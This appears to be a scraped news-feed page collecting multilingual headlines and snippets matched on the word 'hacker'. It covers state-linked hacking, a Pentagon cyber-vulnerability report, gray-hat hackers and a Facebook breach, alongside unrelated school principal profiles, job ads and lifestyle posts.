I just want to be a user Please help
          Russian-linked hackers are now operating in the shadows, report says      Cache   Translate Page      
The infamous Russian-linked hacking group, best known for carrying out a series of high-profile cyber attacks against the Democratic National Committee, is now operating in the shadows. Veuer's Chandra Lanier has the story.

 
 
 
 
 
 
  Reported by USATODAY.com 28 minutes ago.
          Lawan Cheater di Gim Fortnite, Epic Games Akuisisi Perusahaan Ini      Cache   Translate Page      

Liputan6.com, Jakarta - Bagi kamu yang sering main gim pasti sudah tidak asing lagi dengan cheater atau pemain bermain curang. Karena itu, semakin populer gim tersebut di pasaran, maka makin banyak pula cheater.

Ambil contoh gim battle royale yang sedang populer saat ini, yaitu Fortnite.

Sejak meluncur pada 2017, Epic Games, selaku pengembang berusaha keras meredam jumlah pemain yang berbuat curang di dalam gim.

Sayang, hingga saat ini hal tersebut masih belum berhasil. Tak patah arang, Epic Games memutuskan untuk mengakuisisi perusahaan pembuat anti-cheat bernama Kamu.

"Bergabung dengan keluarga Epic merupakan mimpi masa kecil yang menjadi kenyataan, dan kami bersemangat untuk membantu pengembang gim atasi cheater di dalam gim," ungkap CEO Kamu, Simon Allaeys yang dikutip dari Ubergizmo, Rabu (10/10/2018).

CEO dan founder Epic Games, Tim Sweeney, juga menyambut gembira bergabungnya Kamu ke dalam keluarga besar perusahaannya.

Sweeney mengatakan, "tim Kamu dan tools-nya merupakan kunci untuk memberikan pengalaman terbaik dan adil bagi seluruh pemain setia Fortnite."

 

Tawarkan Layanan ke Perusahaan

Gim Fortnite di Galaxy Note 9 (Liputan6.com/ Agustin Setyo W)#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

Sebelum bergabung dengan Epic Games, Kamu sudah menyediakan layanan anti-cheat buatannya ke sejumlah gim dan perusahaan lain.

Meski sudah diakuisisi oleh Epic Games, perusahaan berbasis di Helsinki, Finlandia tersebut tetap akan menawarkan layanannya ke perusahaan gim lain.

Hacker Marak Jual Akun Fortnite Curian di Instagram

Fortnite kini sudah menyambangi iOS (sumber: Epic Games)#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

Sebelumnya, Motherboard mengungkap laporan tentang maraknya hacker yang jual akun Fortnite di Instagram.

Dikutip dari Softpedia, Kamis (4/10/2018), ternyata ada beberapa akun di Instagram yang menjual barang-barang curian di dunia siber, salah satunya adalah akun Fortnite.

Padahal, Instagram sebelumnya tidak pernah menjadi platform yang menarik bagi para pelaku kriminal siber tersebut.

Namun, pengawasan konten yang lebih longgar ketimbang jejaring sosial lain membuat pelaku kriminal menjadikan Instagram sebagai tempat berjualan baru.

(Ysl/Jek)

Saksikan Video Pilihan Berikut Ini:


          The Complete Guide to Crowdsourced Security Testing      Cache   Translate Page      

The old way of doing security has failed, and more organizations are starting to trust crowdsourced ethical hackers to help with the growing demands of cybersecurity in a world that is technologically complex and increasingly threatened. As Crowdsourced Testing Solutions, including bug bounty programs, vulnerability discovery and hacker-powered penetration testing solutions have become viable options for a growing number of security leaders in recent years, defining the landscape and describing the differences and evolution of different offerings is overdue. 

We have based the analysis in this report on the data we have gathered through thousands of tests over the last few years; including hacker demographics, hacker activity, vulnerabilities found, vulnerabilities not found (but searched for), customer demographics, customer asset data and security of those assets over time.

 



Request Free!

          Apple dementiert Bericht über Spionage-Chips       Cache   Translate Page      
Apple hat den Bericht über angeblich vom Konzern entdeckte Spionage-Chips aus China in einem Brief an den US-Kongress zurückgewiesen. Laut einer US-Nachrichtenagentur ist es chinesischen Militärhackern gelungen, Server von Apple auszuspionieren.
          Cyber Tests Showed 'Nearly All' New Pentagon Weapons Vulnerable To Attack, GAO Says - NPR      Cache   Translate Page      

NPR


          HACKER, Stanley E.      Cache   Translate Page      
HACKER, Stanley E. Age 78, passed away on Sunday, October 7, 2018, at Hospice of Hamilton. He was born on May 22, 1940 in .....
          "At its peak, Apple was seeing 60% of warranty repairs in China and Hong Kong as being fraudulent, literally costing Apple billions of dollars per year"      Cache   Translate Page      
9to5:
Initially, Apple stopped allowing walk-in repairs and required reservation systems that supposedly ensured proof of ownership was provided. The system was beaten by hackers who exploited vulnerabilities in the web system who sniped all the time slots.

Apple then required candidate iPhone devices to run software diagnostics which would identify any fake parts inside, without requiring store staff to disassemble components and perform inspections. The thieves circumvented this by simply making the iPhones not turn on.

Some criminals were even more sophisticated.

          Social Hackers Academy?: Οι σημερινοί πρόσφυγες και άνεργοι, οι αυριανοί προγραμματιστές - [Epixeiro]      Cache   Translate Page      
Image

Το πρώτο coding school στην Ελλάδα που βοηθά στην κοινωνική ένταξη των ανέργων, προσφύγων και ευάλωτων ομάδων, προσφέροντας άμεση πρόσβαση στην αγορά εργασίας. H Social Hackers Academy είναι μια μη κερδοσκοπική εταιρία βασισμένη στην Αθήνα που δημιουργήθηκε από τρεις συνιδρυτές (Δαμιανός Βαβανός...


          Anon is a Hacker      Cache   Translate Page      
Who is this 4chan?
          Senior Consultant, Red Team - Deloitte - Montréal, QC      Cache   Translate Page      
We’ve already performed hacking for our clients world-wide and in all industry sectors, and we’re now looking for hackers who are ready to respond to the most...
From Deloitte - Fri, 28 Sep 2018 07:36:20 GMT - View all Montréal, QC jobs
          Growth Hacker - KLF Group - Montréal, QC      Cache   Translate Page      
Experience with growth hackings tools. We’re looking for a Growth Hacker to help find creative ways to over-deliver on our ambitious client acquisition targets....
From Indeed - Tue, 25 Sep 2018 21:31:43 GMT - View all Montréal, QC jobs
          Lawan Cheater di Gim Fortnite, Epic Games Akuisisi Perusahaan Ini      Cache   Translate Page      

Liputan6.com, Jakarta - Bagi kamu yang sering main gim pasti sudah tidak asing lagi dengan cheater atau pemain bermain curang. Karena itu, semakin populer gim tersebut di pasaran, maka makin banyak pula cheater.

Ambil contoh gim battle royale yang sedang populer saat ini, yaitu Fortnite.

Sejak meluncur pada 2017, Epic Games, selaku pengembang berusaha keras meredam jumlah pemain yang berbuat curang di dalam gim.

Sayang, hingga saat ini hal tersebut masih belum berhasil. Tak patah arang, Epic Games memutuskan untuk mengakuisisi perusahaan pembuat anti-cheat bernama Kamu.

"Bergabung dengan keluarga Epic merupakan mimpi masa kecil yang menjadi kenyataan, dan kami bersemangat untuk membantu pengembang gim atasi cheater di dalam gim," ungkap CEO Kamu, Simon Allaeys yang dikutip dari Ubergizmo, Rabu (10/10/2018).

CEO dan founder Epic Games, Tim Sweeney, juga menyambut gembira bergabungnya Kamu ke dalam keluarga besar perusahaannya.

Sweeney mengatakan, "tim Kamu dan tools-nya merupakan kunci untuk memberikan pengalaman terbaik dan adil bagi seluruh pemain setia Fortnite."

 

Tawarkan Layanan ke Perusahaan

Gim Fortnite di Galaxy Note 9 (Liputan6.com/ Agustin Setyo W)#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

Sebelum bergabung dengan Epic Games, Kamu sudah menyediakan layanan anti-cheat buatannya ke sejumlah gim dan perusahaan lain.

Meski sudah diakuisisi oleh Epic Games, perusahaan berbasis di Helsinki, Finlandia tersebut tetap akan menawarkan layanannya ke perusahaan gim lain.

Hacker Marak Jual Akun Fortnite Curian di Instagram

Fortnite kini sudah menyambangi iOS (sumber: Epic Games)#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

Sebelumnya, Motherboard mengungkap laporan tentang maraknya hacker yang jual akun Fortnite di Instagram.

Dikutip dari Softpedia, Kamis (4/10/2018), ternyata ada beberapa akun di Instagram yang menjual barang-barang curian di dunia siber, salah satunya adalah akun Fortnite.

Padahal, Instagram sebelumnya tidak pernah menjadi platform yang menarik bagi para pelaku kriminal siber tersebut.

Namun, pengawasan konten yang lebih longgar ketimbang jejaring sosial lain membuat pelaku kriminal menjadikan Instagram sebagai tempat berjualan baru.

(Ysl/Jek)

Saksikan Video Pilihan Berikut Ini:


          Pentagon slow to protect weapon systems from cyber threats: U.S. agency      Cache   Translate Page      
The Pentagon has been slow to protect major weapon systems from cyber attacks and routinely found critical vulnerabilities that hackers could potentially exploit in those systems, a federal government report said on Tuesday.
          Gray Hats: Cybersecurity Pros Straddle Good and Bad Hacking Practices      Cache   Translate Page      
Gray Hats: Cybersecurity Pros Straddle Good and Bad Hacking Practices juliet.vanwage… Mon, 10/08/2018 - 16:12

Are cybercriminals winning? That was the question posed by Marcin Kleczynski, founder and CEO of Malwarebytes, during his presentation “Is the New Cybercriminal Mafia Winning? Recruitment, Retention and the Hire” at Cyber Security Chicago on Sept. 26, 2018. This presentation, along with the recent release of an Osterman Research white paper titled “White Hat, Black Hat and the Emergence of the Gray Hat: The True Costs of Cybercrime,” sponsored by Malwarebytes, paints a troubling picture of the current state of cybersecurity, the cybersecurity profession and the resulting costs to organizations.

VIDEO: Check out how new tools and solutions equip IT teams with more advanced, effective security defenses!

Cybersecurity Budgets on the Rise for Businesses

Large organizations in the U.S. were queried by Osterman Research in 2017 about their then-current security budgets and their projected 2018 budgets. These companies reported a 21.2 percent increase in spending from 2017 to 2018, averaging growth from $697,000 to $845,000.

“Cybersecurity has become a board-level discussion,” says Kleczynski. “With all of these breaches in the news, I’ve seen chief security officers come to board meetings with articles printed out, showing the board members and CEOs what could possibly happen.”

This increase is promising for security teams, which have traditionally been an afterthought in the corporate budget hierarchy. But it can also be a bad sign for businesses, reflecting an increase in cyberthreats and a growing need to address them.

“While security budgets are increasing, the amount of security needed to protect an organization is increasing, as well,” Kleczynski explains.

Breaches and Remediation Continue to Cost Companies

When you take a closer look at where that budget is going, these organizations spent 14.7 percent of it addressing active compromises, according to the report. This refers to costs associated with day-to-day remediation, fixing active breaches caused by phishing attacks, malware and the like.

“Nearly 15 percent of these budgets are being spent on remediation,” Kleczynski says. “They spend all of this money on prevention, and yet 15 percent is still being used to remediate. So, this raises an interesting issue: Is protection just never enough and remediation is always necessary? Or do businesses need to reinvest more money into protection in the first place?”

The survey also asked about a hypothetical catastrophic security event, such as a widespread ransomware attack. The survey results calculated that these companies would spend an average of $429,000 to remediate such an event. That’s more than 50 percent of their projected 2018 budgets. This heavy cost factors in a variety of expenses tied to major event remediation: direct IT and labor costs, software and hardware solutions, direct costs such as paying a ransom, fines and legal fees.

And, make no mistake, catastrophic breaches are going to happen. The survey reveals that these organizations experienced an average of 1.8 major security events in 2017 — with the U.S. seeing nearly three times as many attacks, on average, as European countries. Budget allocated for catastrophic remediation will not go untouched.

Cybersecurity-report_EasyTarget.jpg

Calculating the Total Cost of Cybercrime

Security budgets are rising, but it still may not be enough to cover the cost of breaches and mitigate growing risks. The survey also looked at the cost to an organization of directly dealing with cybercrime, breaking down costs into three areas: the security infrastructure itself, the off-budget costs tied to major security events and costs tied to insider threats:

  • $1.9 million: total costs for U.S. organizations
  • $697,000: total infrastructure costs
  • $759,000: total remediation costs
  • $440,000: total insider-threat costs

According to these cost breakdowns, there is a significant gap between what organizations are budgeting to address security ($845,000) and what they are actually paying ($1.9 million); not even half of the total costs of cybercrime are covered.

The Rise of the Gray Hat Hacker

Insider threats, specifically black hat activity, represent a notable portion of cybercrime. Among U.S. cybersecurity professionals, 50 percent have known someone that has participated in black hat activity, and 22 percent have been approached about engaging in it. One in 20 of surveyed cybersecurity professionals identified themselves as gray hats — holding down a white hat job as a professional while also engaging in black hat activity on the side.

Much of the motivation of gray hats lies in the belief that it’s easy to engage in cybercrime without getting caught or prosecuted.

“A lot of cybercriminals aren’t being prosecuted very vigorously,” says Kleczynski. “There were only 47 prosecutions in the U.K. last year under the Computer Misuse Act.”

The other obvious motivation is money: There’s greater financial opportunity wearing a black hat than there is wearing a white hat.

“Part of the problem is a lot of companies are not paying their cybersecurity professionals enough, or they’re not giving them enough challenging tasks. They’re not being engaged,” says Kleczynski. “If you put a more lucrative package in front of them, with very little risk of being caught or prosecuted, it’s understandable that they will consider it.”

This makes for an interesting dynamic within the cybersecurity profession at the moment, Kleczynski notes. On one hand, there is a shortage of security professionals and security is only growing as a driver and concern within the corporate world. On the other hand, budgets do not align with the reality of cybersecurity needs. Companies have not yet come around to seeing the connection between the risks they are facing and the need to put out money for security talent to protect them.

“The situation is odd, because you have a massive shortage of personnel in the white hat industry, so companies should be paying for top talent and retention, but they’re not,” says Kleczynski. “That dynamic is not sustainable.”


          North Korean hackers tried to steal $1.1-billion in attacks on banks      Cache   Translate Page      
A North Korean hacking group has tried to steal at least $1.1-billion in a series of attacks on global banks over the past four years, according to cybersecurity firm FireEye.
          No Personal Injury Coverage for Payment Card Breach Because Damages Resulted from Hacker’s Criminal Conduct, Not Insured’s Data Security Practices      Cache   Translate Page      
A Florida federal district court has ruled that a claim asserting that an insured’s negligent data security practices led to a payment card breach did not trigger personal injury coverage under a CGL policy.  See St. Paul Fire & Marine Ins. Co. v. Rosen Millennium, Inc., No. 6:17-cv-540-Orl-41GJK (M.D. Fla. Sept. 28, 2018).  The court...… Continue Reading
          io9 James Gunn Is Moving to DC and Is in Talks to Write the Next Suicide Squad Film | Jalopnik Most       Cache   Translate Page      

io9 James Gunn Is Moving to DC and Is in Talks to Write the Next Suicide Squad Film | Jalopnik Most Hated Car on the Internet Defeated By Intersection | Kotaku Sources: Microsoft Is Close To Buying Obsidian | Offspring Read These Redditors’ Parenting Tricks That Backfired | The Takeout Conspiracy theories abound after DiGiorno frozen pizzas spotted…

Read more...


          Stop and Ask: Why Does Google Need Hardware? - Washington Post      Cache   Translate Page      

Washington Post

Stop and Ask: Why Does Google Need Hardware?
Washington Post
So many internet and software companies make gadgets now. Amazon, Microsoft, Google and Facebook all make some type of internet-connected computing gear. Even Uber has started to engineer its own electric scooters. The one thing all these ...
What Drives Tech Internet Giants To Hide Data Breaches Like The Google+ BreachForbes
Google's Home Hub is Missing a Camera. Here's Why That's a Smart IdeaTIME
Google takes on the iPad Pro and Surface Pro with the Pixel SlateMashable
Lifehacker -NDTV -Telegraph.co.uk -The Independent
all 3,177 news articles »

          An alarming report shows hackers can break into US weapons systems in less than an hour - Business Insider      Cache   Translate Page      

Business Insider

An alarming report shows hackers can break into US weapons systems in less than an hour
Business Insider
A new Government Accountability Office (GAO) report shows Department of Defense vulnerabilities stemming back to the 1990s. Hackers used unsophisticated, easily accessible equipment to access a DoD weapons system in only one hour. Current ...
Government watchdog says US weapons systems are vulnerable to hacks, but the Pentagon is slow to actTechCrunch

all 297 news articles »

           BUFALA E TRUFFA Avete ricevuto un rimborso HSE24: pericoloso SMS, ecco il messaggio       Cache   Translate Page      

Risulta essere in circolazione oggi 9 ottobre un pericoloso SMS che ci parla di un presunto rimborso HSE24, la nota piattaforma online che conta tantissimi iscritti in Italia e che in queste ore pare essere indirettamente vittima di un attacco hacker, almeno stando alle segnalazioni sul messaggio in rapida diffusione nel nostro Paese. Scendendo maggiormente in dettagli, trapela che l’azienda ...


          Students Play a Knee Slapping Cover of the Classic Journey Song ‘Don’t Stop Believing’ on Boomwhackers      Cache   Translate Page      

HarvardTHUD, a group of percussively talented undergraduate students in Cambridge, Massachusetts, performed a truly respectable, knee slapping cover of the classic Journey song “Don’t Stop Believing” on interchangeable Boomwhackers. We’re a student-run organization at Harvard College that likes to get together on Monday evenings and hit things. We play everything with percussive potential: drum set...

The post Students Play a Knee Slapping Cover of the Classic Journey Song ‘Don’t Stop Believing’ on Boomwhackers appeared first on Laughing Squid.


          The Complete Guide to Crowdsourced Security Testing      Cache   Translate Page      

The old way of doing security has failed, and more organizations are starting to trust crowdsourced ethical hackers to help with the growing demands of cybersecurity in a world that is technologically complex and increasingly threatened. As Crowdsourced Testing Solutions, including bug bounty programs, vulnerability discovery and hacker-powered penetration testing solutions have become viable options for a growing number of security leaders in recent years, defining the landscape and describing the differences and evolution of different offerings is overdue. 

We have based the analysis in this report on the data we have gathered through thousands of tests over the last few years; including hacker demographics, hacker activity, vulnerabilities found, vulnerabilities not found (but searched for), customer demographics, customer asset data and security of those assets over time.

 



Request Free!

          Hackers Targeting Instagram Accounts of Influential Profiles for Ransom in a Recent Campaign      Cache   Translate Page      

 

The high-profilers and big shots should now be prepared to safeguard their Instragram account, as the hackers are targeting Instagram accounts of influential profiles. The hackers are also asking for hefty ransom amount after hacking the Instagram accounts.

 

...

Read the rest of: Hackers Targeting Instagram Accounts of Influential Profiles for Ransom in a Recent Campaign


          Illinois braces for another Russian attack on its election systems      Cache   Translate Page      
The frontline in the war between foreign hackers and U.S. election officials is an office in a Springfield, Illinois strip mall.
          Dr-Laura-Rosenbach-The-students-and-staff-make-Hough-a-special-place      Cache   Translate Page      
Contact: Hacker, Brian
Page Image:
Page Content:

On Sept. 12, the staff at Hough High had a staff luncheon after students' early release. Principal Dr. Laura Rosenbach was completely surprised when Northwest Learning Community Superintendent, Dr. Matt Hayes, showed up with balloons and an announcement. Dr. Rosenbach was named Northwest Learning Community Principal of the Year.

"Laura has a phenomenal distributive-leadership structure design for the adults in her building," said Dr. Hayes.  "This structure drives a positive learning environment for all of her students while preparing her staff for future leadership opportunities."

Dr. Rosenbach was "truly shocked" to learn she'd been honored by her fellow principals. "I have so much respect for my peers," she said. "They are doing phenomenal things in my school. I know how hard they work so this means a lot."

A native of Gettysburg, Pa., she earned her bachelor's degree at Davidson College and her master's and doctorate from the University of North Carolina at Charlotte. "I always knew that I wanted to be a teacher," said Dr. Rosenbach. "I taught civics and economics and I loved it."

She joined CMS 19 years ago. She was a student teacher and then teacher at Vance High. She became an assistant principal and helped open Mallard Creek High, where she worked for three years. She was the principal of Bradley Middle and then became Hough principal six years ago.

"Hough is an amazing school," said Dr. Rosenbach. "The students and staff make Hough a special place. Students inspire me with what they do and how much they care about each other and how much effort they are willing to put in. I feel very inspired by watching our students."

Dr. Rosenbach credits the staff at Hough for helping her earn Principal of the Year honors for their learning community. "This award is really for all of my staff," she said. "They are hard-working and deserve to be recognized for everything they do."

Because she was a principal at Bradley Middle, Dr. Rosenbach has been able to follow some of her students from middle school through high school. "I had about 100 students from sixth through 12th grade and it was so fun to watch them find their talents and themselves," she said. "It was so cool to be there for their first orchestra concert and there for their last."

Watching students' growth is one of the things Dr. Rosenbach really enjoys about teaching high school. "You get to see students at an age where they have fully discovered their passions and strengths," she said. "You get to watch and support them as they flourish. Whether that is in forensic science, JROTC, sports or poetry, you get to see them at their best and have really great conversations with them about their future plans."

Rosenbach works closely with her seniors. "I work with them to make sure that they get to shake my hand in June," she said.

Byline: Northwest Learning Community Principal of the Year
Article Date: 10/3/2018
Hide physical URLs from search: No
Hide from Internet Search Engines: No

          Dr-Timisha-Barnes-Jones-I-want-to-be-a-champion-for-those-that-dont-have-advocates      Cache   Translate Page      
Contact: Hacker, Brian
Page Image:
Page Content:

West Charlotte High Principal Timisha Barnes-Jones was stunned to learn she was chosen as Principal of the Year for the Central 1 Learning Community.

"I'm really humbled and feeling very blessed" said Dr. Barnes-Jones. She has been an educator for more than 21 years, 19 of those with Charlotte-Mecklenburg Schools.

Barnes-Jones' ability to lead with heart and hard work led to her selection. Dr. Denise Watts, Center City 1 learning community superintendent, said Barnes-Jones' leadership has led to "significant changes to student and staff culture, reviving school pride and cultivating an environment in which students and teachers now thrive."

"Dr. Barnes-Jones is a powerful example of heart-centered leadership," Watts said. "With a perfect blend of heart, strategy and instructional aptitude, she has been able to attain transformational outcomes for students at West Charlotte." Watts cited as examples a rise in the graduation rate and the steady climb in student performance on state tests.

Barnes-Jones, a Kannapolis native, was lured to the cafeteria for what she thought was a student situation. Instead, she was greeted by students, staff and learning community staff.

"From the time she was really two years old, we recognized a special gift in her," said Barnes-Jones' mother, Mary Barnes, a retired educator from Kannapolis City Schools. Barnes said her daughter began singing publicly at age 9 and that she has performed for dignitaries, as well as in "The Color Purple."

Barnes-Jones applied her talent to the education field, teaching music at Winterfield Elementary, Highland Renaissance Academy and Phillip O. Berry, Olympic and Independence high schools before moving into administration. She has a bachelor's degree in music from Davidson College, a master's degree in education from the University of North Carolina-Charlotte and a doctorate in educational leadership from Gardner-Webb University.

She began her tenure at West Charlotte as an assistant principal after working at E.E. Waddell and Vance high schools. She became West Charlotte's co-principal in 2013 when the school had two campuses and took the helm the next year.

Barnes-Jones said she became a principal because she wanted to have an impact on the lives of students.

"I want to be a champion for those who don't have advocates, to expand my reach from the classroom and create a culture where we're seeing the light bulbs go off," she said. "Some students are one caring adult away from being a success. I had those people who believed in me and I'm happy to give back in that way."

Barnes-Jones said she has always believed in West Charlotte's potential for success and that giving students the right environment would yield positive results. According to the most recent data, the school improved from a grade of D to C in one year and showed an increase in college and career readiness. Since her tenure at West Charlotte graduation rates have improved over 54% and in 2017 West Charlotte was removed from the recurring low performance school list and designated a school of high growth by NC.

For the past 3 years the school has celebrated with Decision Day, which recognized students who were going on to 36 colleges and three branches of the military. This year she launched four career academies and improved AP enrollment by 88%.

"They are seeing they can achieve at high levels," Barnes-Jones said, "and they have real options for the 21st century."

Byline: Central 1 Learning Community Principal of the Year
Article Date: 10/3/2018
Hide physical URLs from search: No
Hide from Internet Search Engines: No

          Merita-Little-My-journey-happened-because-I-met-a-little-boy      Cache   Translate Page      
Contact: Hacker, Brian
Page Image:
Page Content:

After Hurricane Florence, principals were asked to walk around their campuses and check for damage. Southwest Learning Community Superintendent Dr. Steve Esposito went to Steele Creek Elementary to help Principal Merita Little look at her school.

"We were walking and my assistant principal, Brian Spaulding, came over to tell me that there was a leak on our auditorium stage," said Little.

She ran to the auditorium and got on the stage, looking up to find the leak. "I was so absorbed in what I was doing, I didn't realize that the gym was full of students," she said. "It took me a few minutes to figure out that there was no leak."

The whole thing was a ruse so that Dr. Esposito could tell Little she was named the Southwest Learning Community Principal of the Year. "It was pretty crazy," said Little. "I know I work in a learning community with many strong principals and it's great that my peers think enough of me for this honor. I love what I do. This has been my life for so many years."

Dr. Esposito said Little was an excellent choice. "She is a talented instructional leader and, best of all, she is an amazing person," he said. "She leads with her heart, yet demonstrates strategic leadership at Steele Creek Elementary by creating systems and processes that are supportive of students and teachers alike. She engages parents and community organizations as a means to support students in the classroom, beautify her campus and celebrate her staff."

Little said the recognition is appreciated, but she feels like her prize comes from her daily activities.  "I can't wait to get to work every day. There aren't many people who can say that. Regardless of the outcome, I already feel like a winner. My relationships with my students and staff have made me become a better person."

Becoming an educator was not something that Little planned to do. She was raised in Pawling, N.Y. and went to school there until her grandmother became ill. Her entire family moved to coastal North Carolina to care for her. Little developed a love for the state and attended North Carolina Agricultural & Technology State University. She planned to go into marketing and even participated in training at a bank in Charlotte. "We were walking as a group in the office and I said hello to the custodian," she said. "I was immediately reprimanded and told, 'We don't speak to the help.' I realized then that this was not the job for me."

While she was trying to figure her future plans, she visited her sister who was a special education teacher in Syracuse, N.Y. She helped out in her sister's classroom and started to develop a passion for education. "My journey happened because I met a little boy," she said. "There was a little boy named Steven. I always wanted to change the world and I realized I could do that in the classroom."

Little decided to return to Charlotte to earn her teaching certificate. She also received her master's degree from Gardner-Webb University.

Little went to Huntingtowne Farms Elementary and met with then-principal Dr. Robert Cannon. "I told him I wanted to be a teacher and I wanted to learn how from the ground up." She started as a teacher assistant, then became a teacher, then a literacy facilitator.

Little thrives on the diversity of the Steele Creek community. "We have children from all over the globe. The entire school works really hard to develop relationships with our families."

When Little was a child, her mother volunteered as an adult literacy instructor. As a child, Little would read with some of the students and was slightly confused when they struggled with words she knew. "I asked my mother why they couldn't read and she promised me one day, I would understand," she said. "And now I do. And I get to make a difference."

Byline: Southwest Learning Community Principal of the Year
Article Date: 10/3/2018
Hide physical URLs from search: No
Hide from Internet Search Engines: No

          Mark-Bosco-Education-is-a-way-of-life      Cache   Translate Page      
Contact: Hacker, Brian
Page Image:
Page Content:

Mark Bosco, principal at Myers Park High, was told that he needed to come on the show's morning announcements to present an award to his media specialist. Bosco was ready to go and then he noticed Central 2 Learning Community Superintendent Tara Lynn Sullivan in the corner with an elaborate arrangement of candy bars. Sullivan was there to tell Bosco he was the Central 2 Principal of the Year.

"It really was a total surprise," said Bosco. "It is especially nice to be recognized by your peers. They are in the trenches with you and doing the work. They know what the demands are. So this recognition means a lot."

Bosco joined CMS 22 years ago as a teacher at Northwest School of the Arts. Throughout his career, many signs pointed him towards working at Myers Park.

His mother, a high school principal, was mentored by one of her formal principals Jim Amendum. He was the principal of Myers Park and mentored Bosco and helped him get his first teaching job at CMS. Bosco was also coached by Charles LaBorde, another Myers Park principal who started the school's IB program.

"It is so great to be part of these continuing legacies," said Bosco. "Last year, we celebrated the 25th anniversary of Myers Park's IB program and it was so exciting to have LaBorde there with us as my mentor. I am honored to be the steward of the IB program."

After graduating from Hartwick College in New York, Bosco was unsure of what career path he wanted to take. His mother encouraged him to pursue his passions: politics, history and working with kids. His mother's strong focus on education made an impact on him.

"The care that she put into working with her kids appealed to me," he said. "My dad was an attorney. That was a job. My mom didn't have a job. She had a passion. Education is a way of life. It was the way she lived her life. I saw her give everything. I wanted to follow her lead and give back with a spirit of service."

Bosco said the unique community at Myers Park is one of the best things about his job. "We have a special community here," he said. "We serve some of the most affluent students and some of the poorest and we love the challenge. We want to meet the needs of all our kids."

Myers Park has earned many accolades for academic excellence, but Bosco says the culture of the school and community are just as important. "We are purposeful about the way we serve kids," he said. "The lives of our students and staff are complicated, but helping all children meet their needs is not."

The school recently had a day, the Mustang Stampede, dedicated to encouraging students to sign up for clubs and get involved in the school. "To have our kids engaged and feeling confident is just as important as test scores."

Bosco enjoys living and working in the Myers Park community. His wife is a guidance counselor at Charlotte Country Day and he says they are very involved in their community. "I love that we are part of this community," he said. "Sometimes it is challenging when you go to the pool and parents want to talk to you, but it's all about investing and being involved."

Byline: Central 2 Learning Community Principal of the Year
Article Date: 10/3/2018
Hide physical URLs from search: No
Hide from Internet Search Engines: No

          Tracey-Pickard-named-principal-at-Hopewell-High-School      Cache   Translate Page      
Contact: Hacker, Brian
Page Image:
Page Content:

Tracey Pickard has been named as principal at Hopewell High effective October 8. Pickard replaces John Gisiano who resigned Aug. 7, 2018.

Pickard has held a variety of positions within Charlotte-Mecklenburg Schools. She has been principal at Charlotte-Mecklenburg Virtual High since 2016. She has also been a principal at Performance Learning Center, where she was a Principal of the Year finalist, and Hawthorne Innovative Cooperative High. Pickard has held other positions in CMS, including area administrator, assistant principal, principal in residence and school counselor.

"With the experience Tracey Pickard has in CMS and a track record of accomplishment for students, we have every confidence that Tracey will be a wonderful leader for the students, staff and families of the Hopewell High School community," said Dr. Clayton Wilcox, superintendent of CMS."

Pickard earned her bachelor's degree in school administration – elementary education and master's degree in counseling and development from Winthrop University. She also earned a master's degree in school administration from the University of North Carolina at Charlotte.

Article Date: 10/3/2018
Hide physical URLs from search: No
Hide from Internet Search Engines: No

          Facebook scopre una violazione della sicurezza: il tuo account è interessato?      Cache   Translate Page      

Facebook scopre una violazione della sicurezza: il tuo account è interessato?

2018, annus horribilis per Facebook. Il famoso social network annuncia questo venerdì che un attacco alla sua rete ha rivelato i dati di quasi 50 milioni di utenti. Secondo il New York Times , la compagnia ha scoperto questo problema durante la settimana. Gli hacker hanno sfruttato un difetto di codifica che ha dato loro accesso a questi milioni di account. Gli hacker sono stati in grado di prendere i controlli dell'account utente. Facebook ha rilasciato una dichiarazione per indicare che ha identificato il difetto e ha avvertito le autorità giudiziarie. "Nel pomeriggio di Martedì 25 settembre il nostro team di ingegneri ha scoperto un problema di sicurezza che colpisce quasi 50 milioni di account. Noi prendiamo molto sul serio e vogliamo informare tutti che cosa passato e i passi immediati che abbiamo preso per proteggere la sicurezza delle persone. Le nostre indagini sono ancora agli inizi ", dice l'azienda.Facebook sta anche considerando che potrebbero essere interessati 40 milioni di account in più. "Stiamo anche prendendo le precauzioni necessarie per reimpostare i token di accesso a 40 milioni di account aggiuntivi che sono stati oggetto di una consultazione" Visualizza come "nell'ultimo anno." "Visualizza come" è una funzionalità che consente agli utenti di vedere come appare il proprio profilo. Se sei stato disconnesso dal tuo account e hai chiesto di tornare, è perché abbiamo scoperto un problema di sicurezza e stiamo prendendo provvedimenti immediati per proteggere le persone su Facebook. "Di conseguenza, circa 90 milioni di persone dovranno ora riconnettersi a Facebook o ad una delle loro applicazioni che utilizzano Facebook Login. Dopo ricollegato, gli utenti riceveranno una notifica nella parte superiore del loro news feed per spiegare cosa successo ", dice Facebook. Questa è un'altra delusione per Facebook che ha sofferto dello scandalo Cambridge Analytica e soffre di una disaffezione del 25% dei suoi membri negli Stati Uniti. Per Giovanni D'Agata presidente dello "Sportello dei Diritti",  ancora una volta è la prova che nessuno è immune agli attacchi informatici. La nostra preoccupazione che non venga compromessa ulteriormente la privacy e la sicurezza dei cittadini.                                                                                                                                                                               

Giovanni D'AGATA


          The 5 Most Important Announcements from Google's Pixel Event      Cache   Translate Page      

Google events don’t typically elicit the same amount of fanfare as Apple’s do, but the announcements are just as enticing for both enthusiasts and anyone who likes shiny new things. This year, in an event held in New York City, the company revealed its new Pixel phones, a redux of the Pixel tablet (now with Chrome…

Read more...


          How to Get a Refund on an Airbnb Stay Gone Awry      Cache   Translate Page      

If you think too hard about the sharing economy, things get weird. We’re perfectly willing to get in a stranger’s car (Uber) or stay in a stranger’s home (Airbnb)—both of which we can arrange via smartphone app. These services offer certain trust markers, like verification and user reviews, but that doesn’t guarantee…

Read more...


          Speak to Your New Baby the Way You'd Speak to Your Older Kids       Cache   Translate Page      

As I prepare for life with a new baby, I’ve been hearing a lot of advice on how to help my five-year-old daughter Maggie transition into her role of a big sister, a title she’s not entirely thrilled about. “Read her some big sibling books,” people say. (Done.) “Let her help out.” (Definitely.) “Get her a gift ‘from…

Read more...


          How to Divest from the Companies Killing the Environment      Cache   Translate Page      

Unless humans transform the economy in such a way that has “no documented historic precedent,” the earth will experience “worsening food shortages and wildfires, and a mass die-off of coral reefs as soon as 2040,” according to a report published Monday by the United Nation’s Intergovernmental Panel on Climate Change.…

Read more...


